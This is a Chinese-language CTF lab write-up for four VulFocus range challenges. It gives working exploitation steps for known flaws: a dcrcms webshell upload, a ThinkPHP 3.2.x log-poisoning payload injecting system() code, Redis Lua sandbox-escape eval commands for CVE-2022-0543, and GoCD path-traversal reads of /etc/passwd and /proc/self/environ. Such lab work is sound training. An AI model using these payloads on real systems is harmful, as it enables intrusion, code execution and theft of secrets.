漏洞指北-VulFocus靶场专栏-中级01
- 中级001 🌸dcrcms 文件上传 (CNVD-2020-27175)🌸
- step1:输入账号 密码
- burp suite 拦截 修改类型为 jpeg
- 中级002 🌸thinkphp3.2.x 代码执行🌸
- step1:burpsuite 抓包
- step2: 改包头
- step3 查看错误日志
- step4 根据错误日志引入phpinfo
- 中级003 🌸Redis Lua沙盒绕过 命令执行(CVE-2022-0543)🌸
- step1: 下载Redis客户端,连接redis
- step2: 执行命令获取id
- step3: 执行命令ls /tmp获取flag
- 中级004 🌸GoCD 任意文件读取漏洞 (CVE-2021-43287)🌸
- 解题思路:
- step1:进入题解按时目录获得下载文件
中级001 🌸dcrcms 文件上传 (CNVD-2020-27175)🌸
原因:
稻草人企业站存在文件上传漏洞,攻击者可利用漏洞获取服务器控制权。 用户名密码:admin 123456 (网站)
解决方案:
step1:输入账号 密码
http://10.11.12.28:62350/dcr/login.htm
上传新闻类型的一句话木马
burp suite 拦截 修改类型为 jpeg
中国蚂蚁剑即可
中级002 🌸thinkphp3.2.x 代码执行🌸
step1:burpsuite 抓包
step2: 改包头
写入命令ls /tmp
GET /index.php?m=–><?=system(ls%20/tmp);?> HTTP/1.1
出现报错,就写入日志
step3 查看错误日志
http://10.11.12.28:59934/Application/Runtime/Logs/Common/23_08_20.log
step4 根据错误日志引入phpinfo
http://10.11.12.28:59934/index.php?
m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_08_20.log
中级003 🌸Redis Lua沙盒绕过 命令执行(CVE-2022-0543)🌸
step1: 下载Redis客户端,连接redis
或者命令行redis-cli.exe -h 10.11.12.28 -p 43510
step2: 执行命令获取id
eval ‘local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”); local io = io_l(); local f = io.popen(“id”, “r”); local res = f:read(“*a”); f:close(); return res’ 0
step3: 执行命令ls /tmp获取flag
eval ‘local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”); local io = io_l(); local f = io.popen(“ls /tmp”, “r”); local res = f:read(“*a”); f:close(); return res’ 0
中级004 🌸GoCD 任意文件读取漏洞 (CVE-2021-43287)🌸
原因:
GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/etc/passwd 对文件进行读取。
解题思路:
step1:进入题解按时目录获得下载文件
#### step2 获得/proc/self/environ下的flag
漏洞是任意文件读取,靶场中flag是在tmp目录下,也没办法查看目录下的文件
/proc/self/environ是Linux系统下的环境变量文件,用于保存系统的一些变量。
/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/proc/self/environ